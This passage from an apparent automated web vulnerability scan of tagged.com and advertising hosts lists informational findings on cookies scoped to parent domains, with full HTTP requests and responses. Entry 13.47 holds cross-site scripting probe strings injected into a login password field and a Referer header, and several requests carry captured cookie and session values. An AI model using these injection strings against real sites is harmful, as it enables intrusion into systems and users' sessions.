Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BkaHQ3EBAAAABAAAAsAAgEA; BASE=x7Q9Hi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vP!; ROLL=U6APJje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49A!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.955434.776692.0XMC
Set-Cookie: F1=BwaHQ3EBAAAABAAAAwAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:36 GMT; path=/
Set-Cookie: BASE=x7Q9Ii23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqC!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:36 GMT; path=/
Set-Cookie: ROLL=U6APOje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWF!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:36 GMT; path=/
Set-Cookie: 68130074=_4dd01dac,0641043210,776692^955434^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1583

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

13.42. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=terms_of_service&t=4342
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BgZHQ3EBAAAABAAAAYAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kePmTH!; ROLL=U6APEje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlI!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BAaHQ3EBAAAABAAAAcAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:24 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kmPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:24 GMT; path=/
Set-Cookie: ROLL=U6APFje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWJ!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:24 GMT; path=/
Set-Cookie: 69569526=_4dd01da0,7784833352,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:24 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.43. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=8004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F
Set-Cookie: ACID=oH320013054845430015; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: ASCID=oH320013054845430015; domain=advertising.com; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 317

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x12
...[SNIP]...

13.44. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=find_groups&t=1362
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BEbHQ3EBAAAABAAAA4AAgEA; BASE=x7Q9Ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPN!; ROLL=U6APMje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.954107.776692.0XMC
Set-Cookie: F1=BMbHQ3EBAAAABAAAA8AAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:43 GMT; path=/
Set-Cookie: BASE=x7Q9Li23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SM!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:43 GMT; path=/
Set-Cookie: ROLL=U6APNje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMuk/lQ81tI!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:43 GMT; path=/
Set-Cookie: 81707588=_4dd01db3,4715256256,776692^954107^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1043

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

13.45. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=terms_of_service&t=5555
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BwWHQ3EBAAAABAAAAUAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kWPmTH!; ROLL=U6APHje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+I!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BgZHQ3EBAAAABAAAAYAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:16 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kePmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:16 GMT; path=/
Set-Cookie: ROLL=U6APEje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlI!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:16 GMT; path=/
Set-Cookie: 94465860=_4dd01d98,7178131662,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.46. http://secure.tagged.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure.tagged.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:27 GMT
Server: Apache
Set-Cookie: S=k48nnbumc29k7tunhd4mautaa0; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.tagged.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 0


13.47. https://secure.tagged.com/secure_login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure_login.html?username=&password=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000043%29%3C%2Fscript%3E&token=88db48c3004723571667ba30eebca51e&perslogin=Y HTTP/1.1
Host: secure.tagged.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883%22%3E%3Cscript%3Ealert(%22INSECURE%22)%3C/script%3E868fc1f78e0=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:51:11 GMT
Server: Apache
Set-Cookie: S=eukphp97h1sm400vgrjmip7qj6; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 4061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dyn/css/3/_2
...[SNIP]...

13.48. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=18842&partnerID=134&